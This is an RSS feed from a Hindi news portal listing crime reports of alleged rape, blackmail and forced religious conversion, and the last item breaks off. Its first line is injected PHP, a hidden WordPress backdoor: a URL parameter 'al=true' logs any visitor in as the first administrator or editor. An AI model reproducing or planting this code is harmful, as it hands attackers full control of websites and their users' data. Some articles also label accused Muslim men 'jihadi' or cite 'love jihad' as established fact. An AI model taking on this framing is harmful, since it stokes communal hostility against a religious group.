// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); RAPE – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 18 Jun 2026 06:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 नागपुर रेप और धर्मांतरण केस में बड़ा एक्शन, वायुसेना अधिकारी की पत्नी मामले में फरार मौलवी गिरफ्तार https://pratyushaashakinayikiran.com/?p=227827 Thu, 18 Jun 2026 06:26:00 +0000 https://pratyushaashakinayikiran.com/?p=227827 नागपुर 

 महाराष्ट्र के नागपुर में वायुसेना के एक अधिकारी की पत्नी के साथ मारपीट, ब्लैकमेलिंग और जबरन धर्म परिवर्तन कराने के मामले में पुलिस को बड़ी कामयाबी मिली है। मामले का तीसरा आरोपी मौलाना मजरत महमूद मकसूद, जो लंबे समय से फरार चल रहा था, बुधवार देर रात सोनेगांव पुलिस स्टेशन में सरेंडर कर दिया।

इसके बाद पुलिस ने उसे गिरफ्तार कर लिया। आरोपी मौलाना को आज यानी गुरुवार (18 जून) को कोर्ट में पेश किया जाएगा, जहां पुलिस उसकी रिमांड की मांग करेगी।

दरअसल, वायुसेना के एक अधिकारी की पत्नी के कथित धर्म परिवर्तन और दुर्व्यवहार का सनसनीखेज मामला इस सप्ताह की शुरुआत में सामने आया था। महिला ने अपने एक पुराने सहपाठी और उसके साथियों पर बलात्कार, ब्लैकमेल, काला जादू और जबरन धर्म परिवर्तन का आरोप लगाया है।

इस मामले में मुख्य आरोपी अय्याज मदारे उसका साथी अमीन शेख पहले से ही पुलिस हिरासत में हैं। वहीं गिरफ्तार मौलवी ने धर्मांतरण और निकाह में सक्रिय भूमिका निभाई थी ।

पूछताछ में होगा खुलासा
मौलाना को गिरफ्तार करने के बाद पुलिस का कहना है कि इससे पूछताछ के दौरान और भी जानकारी सामने आने की संभावना है। पुलिस अब निकाहनामा ( विवाह प्रमाण पत्र) प्राप्त करने और यह पता लगाने की कोशिश करेगी कि क्या इसमें और भी लोग शामिल थे। वे यह भी पता लगाएंगे कि क्या अन्य महिलाओं को भी इसी तरह जबरन धर्म परिवर्तन कराया गया था।

क्या है पूरा मामला
एफआईआर के अनुसार, 8 फरवरी, 2025 को एक होटल में हुई बैठक के दौरान, अयाज ने 24 वर्षीय महिला के पेय में मादक पदार्थ मिला दिया। इसके बाद महिला की आपत्तिजनक तस्वीरें और वीडियो रिकॉर्ड कर लिए थे। वीडियो और तस्वीरों के आधार पर महिला को ब्लैकमेल किया और धमकी दी कि वह वीडियो उसके पति को भेज देगा और उन्हें सोशल मीडिया पर फैला देगा।

पीड़िता ने आरोप लगाया कि उसके साथ बार-बार यौन उत्पीड़न किया गया और उससे लगभग 4 लाख रुपये जबरन वसूले गए।
वीडियो में महिला रोती हुई और आरोपी अयाज मदारे से उसे छोड़ने की गुहार लगाती हुई दिखाई दे रही है। वीडियो में महिला को " छोड़ो मुझे " कहते हुए सुना जा सकता है, जबकि अयाज जबरदस्ती उसके हाथ पकड़े हुए धार्मिक मंत्रों का जाप कर रहा है और बार-बार उस पर फूंक मार रहा है। महिला खुद को छुड़ाने के लिए संघर्ष करती हुई दिखाई दे रही है। महिला का आरोप है कि बाद में उसे धर्म परिवर्तित घोषित कर दिया गया और उसके बाद उसके साथ बलात्कार करने का प्रयास किया गया।

एफआईआर में महिला ने आरोप लगायै कि अयाज उसके लिए अक्सर एक प्लास्टिक की बोतल में कोई तरल पदार्थ भरकर लाता था और उसे जबरदस्ती पिलाता था। इसके बाद वह कथित तौर पर उर्दू में कुछ बुदबुदाता था, उसके चेहरे पर फूंकता था और कहता था कि यह सम्मोहन और काला जादू है, फिर उसके साथ बलात्कार करता था।

31 मई को मदारे और उसके साथी ने महिला को जबरन कलमेस्वर ले गए। वहां, तीसरे आरोपी मध्य प्रदेश के छिंदवाड़ा जिले के तामिया गांव के हजरत मौलाना ने धार्मिक अनुष्ठान किए और महिला को जबरन कुबूल है कहने के लिए मजबूर किया ताकि वह इस्लाम धर्म अपना ले।

महिला का कहना है कि यह सब उसके इच्छा के विरुद्ध किया गया था। अनुष्ठान के बाद, मौलाना ने घोषणा की कि महिला ने इस्लाम धर्म अपना लिया है और उसका अयाज के साथ निकाह हो गया है।

]]>
एयरफोर्स अधिकारी की पत्नी से कथित दुष्कर्म और ब्लैकमेलिंग का मामला, मौलाना समेत कई लोगों पर गंभीर आरोप https://pratyushaashakinayikiran.com/?p=227511 Tue, 16 Jun 2026 13:06:00 +0000 https://pratyushaashakinayikiran.com/?p=227511 छिंदवाड़ा 
 मध्य प्रदेश के छिंदवाड़ा के एक मौलाना का बड़ा कांड सामने आया है। यहां आरोप मौलाना ने एक एयरफोर्स अफसर की पत्नी को जबरन कलमा पढ़ाया और दोस्तों के से पीड़िता को ब्लैकमेल करके दुष्कर्म करवाया। आरोप है कि मौलाना और उसके साथियों ने महिला की आपत्तिजनक तस्वीरें वायरल करने की धमकी देकर लगभग सवा तीन लाख रुपए ऐंठे हैं। फिलहाल छिंदवाड़ा का रहने वाला आरोपी मौलाना पुलिस की गिरफ्त से बाहर है। उसके दो सहयोगी गिरफ्तार हो चुके हैं।

जानकारी के मुताबिक, पीड़िता महाराष्ट्र के नागपुर में भारतीय वायु सेना के एक अधिकारी की पत्नी है। उसने पुलिस में दुष्कर्म, ब्लैकमेलिंग, जबरन वसूली और धर्म परिवर्तन के लिए दबाव बनाने की शिकायत दर्ज कराई है। पुलिस के अनुसार, 24 वर्षीय पीड़िता नागपुर में प्रॉपर्टी डीलिंग का काम करती है। पति नौकरी के कारण अकसर दूसरे शहर में रहते थे। फरवरी 2025 में पीड़िता के पुराने सहपाठी अयाज ताज मदारे ने जमीन खरीदने की इच्छा जताई और बात करने के लिए वर्धा रोड स्थित एक होटल में बुलाया। पीड़िता का आरोप है कि होटल में बातचीत के दौरान आरोपी ने उसे कोल्ड ड्रिंक में नशीला पदार्थ मिलाकर पिला दिया। जिसके बाद वह बेहोश हो गई। पीड़िता का आरोप है कि इसी दौरान आरोपी ने उसके साथ दुष्कर्म किया और आपत्तिजनक फोटो व वीडियो बना लिए। जब पीड़िता को होश आया तो उसे अपने साथ हुई हैवानियत की जानकारी लगी। उसका आरोप है कि आरोपी यही नहीं रूका उसने बाद में उसकी वीडियो और तस्वीरों को सोशल मीडिया पर वायरल करने की धमकी देकर उसे लगातार मानसिक रूप से प्रताड़ित करना शुरू कर दिया।

शुरू हुआ ब्लैकमेलिंग का सिलसिला
पीड़िता के मुताबिक, आरोपी कई महीनों तक उसे ब्लैकमेल करता रहा। वीडियो और तस्वीरें वायरल करने की धमकी देकर उसने उससे कई बार पैसे लिए। थोड़े थोड़े करके आरोपी ने उससे लगभग 3 लाख 9 हजार रुपये वसूले गए। हद तो तब हो गई जब मई 2025 में आरोपी ने महिला को नागपुर के समीप कलमेश्वर क्षेत्र बुलाया। वहां उसकी मुलाकात अमीन शेख और छिंदवाड़ा के रहने वाले एक मौलाना से करवाई। तीनों ने मिलकर उससे कलमा पढ़वाया गया और धर्म परिवर्तन का दवाब बनाया। इस दौरान कई तंत्र-मंत्र जैसी गतिविधियां कराई गईं। महिला का आरोप है कि उसकी यह सब उसकी इच्छा के विरुद्ध किया गया और उसे मानसिक रूप से डराने का प्रयास किया गया।

 

]]>
नासिक: IT कंपनी में रेप और जबरन धर्मांतरण, HR हेड पर केस, 6 अरेस्ट, 4 साल से चल रहा था गंदा धंधा https://pratyushaashakinayikiran.com/?p=211266 Thu, 09 Apr 2026 08:06:00 +0000 https://pratyushaashakinayikiran.com/?p=211266 नासिक

 महाराष्ट्र के नासिक में एक बड़ी आईटी कंपनी में महिलाओं के साथ छेड़छाड़, रेप और जबरन धर्मांतरण का गंभीर मामला सामने आया है. नासिक पुलिस ने इस मामले में छह टीम लीडर को गिरफ्तार कर लिया है. सभी छह आरोपी अलग-अलग आरोपों में गिरफ्तार किए गए हैं. इनमें से एक टीम लीडर पर रेप का आरोप है, जबकि बाकी पर महिला सहकर्मियों से छेड़छाड़ और दफ्तर में धार्मिक भावनाओं से जुड़ी अपमानजनक बातें करने के आरोप लगे है। 

रिपोर्ट के मुताबिक संदिग्ध आरोपी तैसिफ अत्तार, दानिश, शाहरुख शेख और रजा मेमन पर एक हिंदू युवक को धर्म परिवर्तन के लिए मजबूर करने की शिकायत दर्ज करवाई गई है. कंपनी में हिंदू युवक को दोपहर के समय नमाज पढ़ने के लिए मजबूर किए जाने का भी आरोप है. इसके अलावा, शिकायत में यह भी उल्लेख कि युवक को जबरन बीफ खिलाया गया. उसी युवक के धर्म परिवर्तन के बाद की तस्वीरें सामने आईं। 

चार सालों से चल रहा था गंदा खेल
पुलिस के अनुसार ये घटनाएं पिछले चार सालों के दौरान अलग-अलग समय पर हुईं. पीड़ित महिलाओं ने कंपनी के एचआर हेड को पॉश यानी प्रीवेंशन ऑफ सेक्सुअल हैरासमेंट के नियमों के तहत लिखित शिकायत की थी. लेकिन एचआर हेड ने कोई कार्रवाई नहीं की. बल्कि एक पीड़िता के अनुसार जब उसने सेक्सुअल हैरासमेंट की जानकारी दी तो एचआर हेड ने कहा कि यह सब एमएनसी में नॉर्मल है, शांत रहो। 

पीड़ितों की शिकायत पर पुलिस ने एचआर हेड के खिलाफ भी मामला दर्ज कर लिया है. मामले की गंभीरता को देखते हुए पुलिस ने एसआईटी का गठन किया है. पुलिस को शक है कि इस मामले में कई और पीड़ित महिलाएं भी हो सकती हैं, जो अभी सामने नहीं आई हैं. जांच टीम सभी एंगल से मामले की जांच कर रही है और अन्य संभावित पीड़ितों से संपर्क करने की कोशिश कर रही है. अभी तक पुलिस ने इस पूरे प्रकरण में कुल नौ एफआईआर दर्ज की हैं, जिनमें से आठ महिलाओं की शिकायतों पर आधारित हैं. इनमें यौन अपराधों और धार्मिक भावनाओं को ठेस पहुंचाने से संबंधित धाराएं शामिल हैं। 

कंपनी में करीब 300 कर्मचारी काम करते हैं और गिरफ्तार किए गए ज्यादातर आरोपी टीम लीडर के पद पर थे. पुलिस का कहना है कि आरोपी लंबे समय से अपनी पोजिशन का दुरुपयोग कर महिलाओं को परेशान कर रहे थे. नासिक पुलिस अब सभी आरोपियों से पूछताछ कर रही है और मामले की गहराई तक जांच जारी है. अगर अन्य पीड़ित सामने आती हैं तो एफआईआर की संख्या और बढ़ सकती है। 

]]>
रीवा में इंस्टाग्राम फ्रेंड ने बर्थडे पर दिया खौफनाक गिफ्ट, केक काटने के बहाने किशोरी से दुष्कर्म https://pratyushaashakinayikiran.com/?p=201648 Sun, 01 Mar 2026 06:55:00 +0000 https://pratyushaashakinayikiran.com/?p=201648 रीवा.

शहर से रिश्तों को शर्मसार करने वाली और इंटरनेट मीडिया की दोस्ती के खतरनाक अंजाम की एक सनसनीखेज वारदात सामने आई है। यहां एक नाबालिग किशोरी को उसके इंस्टाग्राम दोस्त ने जन्मदिन मनाने के बहाने बुलाकर अपनी हवस का शिकार बनाया। पुलिस ने इस मामले में तत्परता दिखाते हुए आरोपी किशोर को गिरफ्तार कर लिया है।

जानकारी के अनुसार, पीड़िता और आरोपी की पहचान इंटरनेट मीडिया प्लेटफॉर्म 'इंस्टाग्राम' के जरिए हुई थी। दोनों के बीच पिछले कुछ समय से बातचीत चल रही थी। बीती 27 फरवरी को किशोरी का जन्मदिन था। जन्मदिन के इस मौके का फायदा उठाकर आरोपी ने उसे मिलने के बहाने बुलाया।

जन्मदिन की रात हुई वारदात
घटनाक्रम के मुताबिक, 27 फरवरी की रात किशोरी अपने परिजनों को बिना बताए घर से निकली थी। उसने घर वालों से सहेली के यहां जाने की बात कही थी। वह बिछिया थाना क्षेत्र के रहने वाले अपने इसी इंस्टाग्राम दोस्त से मिलने पहुंची। वहाँं आरोपी किशोर ने केक काटने और जन्मदिन मनाने के बहाने किशोरी के साथ दुष्कर्म की वारदात को अंजाम दिया।

परिजनों को सुनाई आपबीती
देर रात किशोरी वापस घर लौटी, तो वह काफी डरी और सहमी हुई थी। परिजनों के पूछने पर उसने रोते हुए पूरी आपबीती सुनाई, जिसे सुनकर परिवार के पैरों तले जमीन खिसक गई। परिजन तुरंत किशोरी को लेकर सिविल लाइन थाने पहुंचे और मामले की रिपोर्ट दर्ज कराई।
सिविल लाइन थाना प्रभारी पुष्पेंद्र मिश्रा ने बताया कि पीड़िता की शिकायत को गंभीरता से लेते हुए तत्काल जांच शुरू की गई। शुरुआत में पीड़िता घटना स्थल और आरोपी के बारे में स्पष्ट जानकारी नहीं दे पा रही थी। उसके बाद पुलिस की विशेष टीम ने शहर के विभिन्न स्थानों के सीसीटीवी फुटेज खंगाले और तकनीकी साक्ष्यों के आधार पर कड़ियां जोड़ीं ।

पुलिस की गिरफ्त में आरोपी
तथ्यों की पुष्टि होने के बाद महिला पुलिस अधिकारी की उपस्थिति में दुष्कर्म की धाराओं के तहत मामला दर्ज किया गया। पुलिस ने त्वरित कार्रवाई करते हुए मुख्य आरोपी किशोर बिछिया क्षेत्र का निवासी है। आरोपी से पुलिस सघन पूछताछ कर रही है और मामले की आगे की कानूनी कार्यवाही जारी है।

]]>
भोपाल में 11वीं कक्षा की छात्रा के साथ रेप, ब्लैकमेलिंग और जबरन वसूली https://pratyushaashakinayikiran.com/?p=194971 Mon, 02 Feb 2026 08:57:00 +0000 https://pratyushaashakinayikiran.com/?p=194971 भोपाल 

मध्यप्रदेश की राजधानी में भी बच्चियां सुरक्षित नहीं हैं। जाल में फंसाकर छात्राओं को लव जिहाद का शिकार बनाया जा रहा है। भोपाल के कोहेफिजा क्षेत्र में एक 11वीं कक्षा की छात्रा के साथ रेप का मामला सामने आया है। मामले में नाबालिग से ब्लैकमेलिंग और जबरन वसूली की बात भी सामने आई है। आरोपी ने पहले नाबालिग छात्रा को प्रेम जाल में फंसाकर उससे कार में रेप किया और उसका अश्लील वीडियो बना लिया। शिकायत के बाद कोहेफिजा पुलिस ने आरोपी ओसाफ अली खान के खिलाफ एफआईआर दर्ज कर उसे गिरफ्तार कर लिया है। पीड़िता कोहेफिजा थाना क्षेत्र की 11वीं की छात्रा है। वह शाहपुरा क्षेत्र के एक प्रतिष्ठित स्कूल में पढ़ती है।

पुलिस ने आरोपी ओसाफ अली खान के खिलाफ एफआईआर दर्ज कर उसे हिरासत में ले लिया है।

सहेली के जरिए दोस्ती और फिर रेप कोहेफिजा थाना टीआई कृष्ण गोपाल शुक्ला के अनुसार, आरोपी ओसाफ अक्सर छात्रा की सहेली से मिलने स्कूल के आसपास आता था। इसी सहेली के माध्यम से उसकी पहचान पीड़िता से हुई।

पिछले साल जुलाई में आरोपी ने पीड़िता को भोपाल घुमाने के बहाने बुलाया और खानूगांव के सुनसान इलाके में ले गया। वहां कार के अंदर आरोपी ने छात्रा के साथ रेप किया। विरोध करने पर उसने शादी का झांसा देकर उसे चुप करा दिया।

सहेली के जरिए दोस्ती और फिर रेप

कोहेफिजा थाना टीआई कृष्ण गोपाल शुक्ला के अनुसार, आरोपी ओसाफ अक्सर छात्रा की सहेली से मिलने स्कूल के आसपास आता था। इसी सहेली के माध्यम से उसकी पहचान पीड़िता से हुई। पिछले साल जुलाई में आरोपी ने पीड़िता को भोपाल घुमाने के बहाने बुलाया और खानूगांव के सुनसान इलाके में ले गया। वहां कार के अंदर आरोपी ने छात्रा के साथ रेप किया। विरोध करने पर उसने शादी का झांसा देकर उसे चुप करा दिया।

पीड़िता ने आरोपी को 40 हजार दिए

आरोपी ने पीड़िता को पता चले बिना रेप के दौरान उसका अश्लील वीडियो बना लिया था। कुछ समय बाद उसने वीडियो वायरल करने की धमकी देकर छात्रा से 1 लाख रुपए की मांग की। बदनामी के डर से घबराई छात्रा ने किसी तरह 40 हजार रुपए का इंतजाम कर आरोपी को दिए।

पैसे लेने बाद दोस्तों को दिखाया वीडियो

पैसे लेने के बाद भी आरोपी की मांग जारी रही और वह बार-बार रेप करने का दबाव बनाता रहा। तंग आकर जब छात्रा ने उसे सोशल मीडिया और फोन पर ब्लॉक कर दिया, तो आरोपी ने अलग-अलग नंबरों से कॉल कर परेशान किया। जब छात्रा नहीं मानी, तो आरोपी ने वह निजी वीडियो छात्रा के दोस्तों को दिखा दिया। इसके बाद छात्रा ने अपने मौसेरे भाई की मदद से थाने पहुंचकर शिकायत दर्ज कराई।

धर्म परिवर्तन और नमाज का दबाव

पीड़िता ने पुलिस को दिए अपने बयान में बताया कि आरोपी उस पर धर्म बदलने का दबाव डालता था। इतना ही नहीं, दबाव बनाकर उससे कई बार जबरन धार्मिक दुआएं भी पढ़वाई गईं। पुलिस ने आरोपी ओसाफ अली खान को गिरफ्तार कर लिया है। आरोपी का मोबाइल फोन भी जब्त कर लिया गया है, जिसकी फोरेंसिक जांच कराई जाएगी। 

धर्म परिवर्तन और नमाज का दबाव पीड़िता ने पुलिस को बताया कि आरोपी उस पर धर्म बदलने का दबाव डालता था। इतना ही नहीं, दबाव बनाकर उससे कई बार जबरन धार्मिक दुआएं भी पढ़वाई गईं। पुलिस ने आरोपी ओसाफ अली खान को हिरासत में ले लिया है। आरोपी का मोबाइल फोन भी जब्त कर लिया गया है, जिसकी फोरेंसिक जांच कराई जाएगी।

]]>
रेप और ब्लैकमेलिंग का मामला: ‘हैप्पी पंजाबी’ बनकर इरफान ने छुपाई पहचान, कलमा न पढ़ने पर करता था पिटाई https://pratyushaashakinayikiran.com/?p=190458 Mon, 10 Nov 2025 08:39:00 +0000 https://pratyushaashakinayikiran.com/?p=190458 इंदौर

इंदौर के विवादित जिहादी हैप्पी अली उर्फ हैप्पी पंजाबी उर्फ इरफान अली के खिलाफ 21 वर्षीय युवती ने सनसनीखेज आरोप लगाते हुए रेप, ब्लैकमेलिंग और जबरन गर्भपात का केस दर्ज कराया है। युवती का आरोप है कि आरोपी ने अपनी असल पहचान छिपाई, नौकरी का झांसा देकर उसे नशीला पदार्थ पिलाकर दुष्कर्म किया, फिर फोटो/वीडियो बनाकर ब्लैकमेल किया। जिसके बाद जबरन शारीरिक संबंध बनाते रहा। यहां तक कि धार्मिक दबाव डाला गया। कलमा याद न करने वह उसे खूब पीटता था।

मामले में पीड़िता ने करणी सेना की मदद ली। शिकायत पर विजयनगर पुलिस ने आरोपी के खिलाफ कई गंभीर धाराओं में मामला दर्ज कर उसे गिरफ्तार कर लिया है।
पीड़िता की आपबीती

शिकायत के अनुसार पीड़िता मूल रूप से राजस्थान की रहने वाली है, उसने दर्ज रिपोर्ट में बताया कि वह निपानिया में किराये के मकान में रहती है और मेकअप आर्टिस्ट का काम करती थी, मेरी मुलाकात मई 2023 में इरफान अली उर्फ हैप्पी अली से हुई थी, उसने अपना नाम उस समय “हैप्पी पंजाबी” बताया था। हैप्पी ने नौकरी दिलाने का झांसा देकर मुझे होटल में बुलाया और वहां कोल्ड ड्रिंक पिलाकर बेहोश कर दिया। जब मैं सुबह उठी तो मेरे शरीर पर कोई कपड़े नहीं थे। तब मुझे पता चला कि हैप्पी ने मेरे साथ जबरन शारीरिक संबंध बनाए विरोध किया तो जिहादी हैप्पी बोला तेरे अश्लील फोटो-वीडियो भी बनाये है।
फोटो-वीडियो दिखाकर ब्लैकमेलिंग

जिसके बाद से ही आरोपी मुझे डरा धमकाकर बार-बार ब्लैकमेल कर मेरे किराये के कमरे पर आता रहा और फोटो-वीडियो दिखाकर ब्लैकमेल कर शारीरिक संबंध बनाता रहा। 2024 में हैप्पी मुझे कहीं लेकर जा रहा था। इसी दौरान उसका विजयनगर क्षेत्र में ऑटो चालक से झगड़ा हुआ था, तब मुझे पता चला कि वह हैप्पी पंजाबी नही बल्कि इरफान अली हैं। विरोध किया तो बोला मैं मुस्लिम हूं, तुझे भी मुसलमान बनना पड़ेगा।

विजयनगर में ऑटो चालक से हुए विवाद के बाद में अपने घर राजस्थान चली गई। जनवरी 2025 में फिर से इंदौर आई तो हैप्पी मुझे फिर से संबंध बनाने और धर्म परिवर्तन का दबाव और ब्लैकमेल कर शारीरिक संबंध बनाने लगा। उसकी हरकतों के कारण में फिर से राजस्थान चली गई। इंदौर फिर आई तो परेशान ब्लैकमेल कर देवास ले गया वहां से जैसे तैसे कर इंदौर आई और घटना परिजनों को बताई। जिहादी हैप्पी अली ने मेरे साथ आखिरी बार अक्टूबर 2025 मे जबरदस्ती शारीरिक संबंध बनाए हैं। एक दिन वह मुझे घर पर छोडकर कही गया तो मैं वहां से भागकर इंदौर आ गई। लोकलाज के डर से मैने अभी तक हैप्पी के खिलाफ रिपोर्ट नही किया था। मामले में पुलिस ने हैप्पी अली पर दुष्कर्म , ब्लैकमेलिंग और जबरन धर्मांतरण का दबाव सहित अन्य धारा में केस किया है।
बार बार दुष्कर्म, फिर गर्भपात

पीड़िता के मुताबिक, जून माह में मैं वापस इंदौर आई तो उसी माह के आसपास आरोपी मुझे देवास ले गया और वहां एक एकांत फ्लैट में बंद कर मेरे साथ कई बार दुष्कर्म किया, जिस कारण मैं गर्भवती हुई, फिर मुझे कोई दवा देकर जबरन गर्भपात करवा दिया गया, जिससे मेरी सेहत खराब हो गई। पीड़िता के मुताबिक हैप्पी अली मुझे सिगरेट से दागता था, मारपीट करता था, जिससे मुझे सिर पर चोट और हाथ पर कट के निशान भी है।
कलमा याद नही होने पर पीटता था

पीड़िता ने दर्ज रिपोर्ट में यह भी बताया कि हैप्पी अली मुझे धर्म परिवर्तन कर निकाह का कहता। मुझे कलमा एवं मुस्लिम दुआ याद करवाता था। मुस्लिम दुआ याद नही होने पर मुझसे मारपीट करता था। मुझसे रोजे रखवाता था एवं मुझे बुर्का पहनने को कहता था। मैं मना करती थी तो कहता था तू मुझे जानती नहीं है, ज्यादा समझदार बनी तो मैं तुझे जान से खत्म कर दूंगा।
ड्रग्स पार्टी

जानकारी के मुताबिक, हैप्पी अली ड्रग्स की बड़ी पार्टियों का आयोजन इंदौर में बड़े पैमाने पर करता है और हैप्पी अली पर 15 से अधिक आपराधिक रिकॉर्ड भी दर्ज हैं। उस पर जिला बदर , रासुका भी लग चुकी है। सूत्रों से जानकारी लगी है कि आरोपी अश्लील वीडियो बनाकर मासूम लड़कियों को ब्लैकमेल करने का काम भी करता है। 

]]>
होटल मालिक के बेटे पर शोषण का आरोप, दो महीने तक धमकाकर बनाए संबंध https://pratyushaashakinayikiran.com/?p=174132 Tue, 29 Jul 2025 12:57:00 +0000 https://pratyushaashakinayikiran.com/?p=174132  इटावा

 इटावा की एक युवती दो महीने से आगरा के ताजगंज क्षेत्र के होटल में रह रही थी। शादी का झांसा देकर एक होटल मालिक के बेटे ने उसे जाल में फंसाया था। कमरा दिलाया था। उसके साथ लगातार संबंध बना रहा था। शादी से इंकार पर युवती से बखेड़ा खड़ा कर दिया। होटल से चीखते हुए बाहर निकल आई। पुलिस बुला ली। पुलिस ने मुकदमा लिखकर आरोपित युवक को जेल भेज दिया।

24 जुलाई की रात युवती ने 112 नंबर पर फोन किया था। वह पुलिस को सड़क पर रोते हुए मिली। पुलिस को बताया एक साल पहले उसकी दोस्ती इंस्टाग्राम पर होटल भूमि रेजीडेंसी निवासी विभोर राजपूत से हुई थी। दो महीने पहले वह आगरा आ गई। आरोपित विभोर ने उसे होटल में ठहराया। वह कमरा नंबर 303 और 209 में रुकी। इस दौरान विभोर ने उससे कई बार संबंध बनाए। उसे शादी का झांसा दिया। जब भी आरोपित का मन करता होटल में उसके कमरे में आ जाता था। एक दिन उसने आरोपित पर शादी का दबाव बनाया। आरोपित ने उसके साथ अभद्रता शुरू कर दी। उसे चरित्रहीन बताने लगा। हकीकत सामने आने पर उसके होश उड़ गए।

जिस युवक के लिए उसने घर छोड़ा था, वह दगाबाज निकला। पुलिस ने पीड़िता की तहरीर पर मुकदमा दर्ज किया। उसका मेडिकल कराया। पुलिस को दिए बयानों में पीड़िता ने आरोपों की पुष्टि की। इसी आधार पर पुलिस ने आरोपित विभोर राजपूत को गिरफ्तार करके जेल भेज दिया। इंस्पेक्टर ताजगंज जसवीर सिरोही ने बताया पीड़िता के कोर्ट में बयान दर्ज कराए गए हैं। आरोपित के पिता के ताजगंज इलाके में कई होटल हैं। पुलिस जांच करने होटल गई थी। युवती के वहां रुकने की पुष्टि हुई। आरोपित भी उससे मिलने आया करता था।
युवती ने दी थी खुदकुशी करने की धमकी

पीड़िता ने पुलिस से कहा आरोपित पकड़ा नहीं जाएगा। रसूख वाला है। उसके परिवार के बड़े नेताओं से संबंध है। उसने यह आरोप भी लगाया कि आरोपित कई लड़कियों की जिंदगी खराब कर चुका है। उसे इंसाफ नहीं मिला, तो खुदकुशी कर लेगी। पुलिस ने पीड़िता को भरोसा दिलाया कि आरोपित पकड़ा जाएगा।

]]>
शादी का झांसा देकर युवती से तीन साल तक शोषण, अश्लील वीडियो वायरल https://pratyushaashakinayikiran.com/?p=172514 Tue, 22 Jul 2025 10:08:00 +0000 https://pratyushaashakinayikiran.com/?p=172514 ग्वालियर
 मध्य प्रदेश के ग्वालियर में एक युवक ने शादी का झांसा देकर नाबालिग को अपनी हवस का शिकार बना लिया। लड़की का 17 साल की उम्र से तीन साल तक शारीरिक शोषण करता रहा। जब मन भर गया तो शादी करने से इनकार कर दिया। इतना ही नहीं उसकी अश्लील फोटो वीडियो भी वायरल कर दिया। फिलहाल पीड़िता की शिकायत पर मामला दर्ज किया गया है। पुलिस ने आरोपी की तलाश शुरू कर दी है।

दरअसल, शहर की रहने वाली युवती ने ग्वालियर थाना पहुंचकर शिकायत की है। जिसमें उसने बताया कि 2022 में जब वह 16 साल की थी उसकी मुलाकात बहन के घर के पास किराए के मकान में रहने वाले भिंड निवासी आकाश बाथम से हुई थी। जिसके बाद दोनों में दोस्ती हुई और दोस्ती प्यार में बदल गई। साल 2023 में एक दिन नाबालिग घर पर अकेली थी तभी आकाश उसके घर पहुंचा और उससे शादी करने का वादा कर दुष्कर्म किया।

तीन साल तक युवती जब भी घर पर अकेली रहती थी तो आकाश उसके घर पहुंचकर उसके साथ शारीरिक संबंध बनाता था। इसी बीच आकाश ने उसके कुछ अश्लील वीडियो फोटो भी बना लिए थे। 24 अक्टूबर 2024 को आकाश उसके घर पहुंचा और उसे हरियाणा में अपने जीजा संदीप बाथम के घर ले गया। यहां भी दो दिन तक रखकर आकाश ने उसके साथ दुष्कर्म किया। इसके बाद आकाश और उसके जीजा उसके यह कह कर छोड़ गए कि अभी तुम नाबालिग हो इसलिए घर जाओ और किसी को कुछ मत बताना।

अश्लील फोटो वीडियो किया वायरल

आकाश लगातार उसका शारीरिक शोषण करता रहा। इसी दौरान युवती को जून 2025 को पता चला कि आकाश कही और शादी कर रहा हैं। इसका विरोध करने पर आरोपी ने उसके अश्लील फोटो वीडियो सोशल मीडिया पर वायरल कर दिए। जिससे परेशान होकर पीड़िता ने अपने परिजनों के साथ थाने पहुंचकर शिकायत की। वहीं पुलिस ने युवती की शिकायत पर आरोपी आकाश के खिलाफ दुष्कर्म, पॉक्सो एक्ट की अन्य धाराओं में मामला दर्ज किया है। साथ ही उसके जीजा के खिलाफ उसकी मदद करने का केस दर्ज कर तलाश शुरू कर दी हैं।

 

]]>
मुस्लिम युवक ने शादी का झांसा देकर हिन्दू लड़की का दुष्कर्म किया, धर्म परिवर्तन का दबाव बनाया https://pratyushaashakinayikiran.com/?p=169767 Fri, 11 Jul 2025 12:26:00 +0000 https://pratyushaashakinayikiran.com/?p=169767 ग्वालियर
देशभर में धर्म छिपाकर शादी का झूठा वादा करके शारीरिक संबंध बनाने के काफी मामले निकलकर सामने आ रहे हैं। ऐसा ही एक मामला ग्वालियर जिले के बहोड़ापुर इलाके में भी आया है, जहां 21 वर्षीय युवती के साथ मुस्लिम युवक ने दुष्कर्म किया।

उसने युवती को शादी का झांसा देकर अपने साथ रखा और कई बार गलत काम किया। इसके साथ ही उस पर धर्म परिवर्तन करने का भी दबाव डालता रहा।अब मामले में अब युवती ने युवक के खिलाफ मामला दर्ज करवाया है। पुलिस ने इस मामले को गंभीरता से लेते हुए युवती की शिकायत पर एफआईआर दर्ज कर ली है।

बहोड़ापुर थाना प्रभारी जितेंद्र सिंह तोमर के मुताबिक, पीड़िता की मुलाकात माधोगंज के लक्कड़खाना क्षेत्र में रहने वाले शान खान से हुई थी। आरोपी ने उसे शादी का झांसा दिया और दोनों साथ में रहने लगे। पहले नौ महीने तक पटेल नगर में और फिर बहोड़ापुर स्थित सदाशिव नगर में आरोपी ने युवती को अपने साथ रखा। इस दौरान उसने युवती के साथ दुष्कर्म किया। पुलिस ने एफआईआर दर्ज कर आरोपी को गिरफ्तार कर लिया है।

]]>
मेरठ में मदर से की छात्रा से हैवानियत, बाल काटकर बताया पागल, मौलाना ने किया रेप, 3 बार गर्भपात https://pratyushaashakinayikiran.com/?p=168572 Fri, 04 Jul 2025 12:19:00 +0000 https://pratyushaashakinayikiran.com/?p=168572  मेरठ
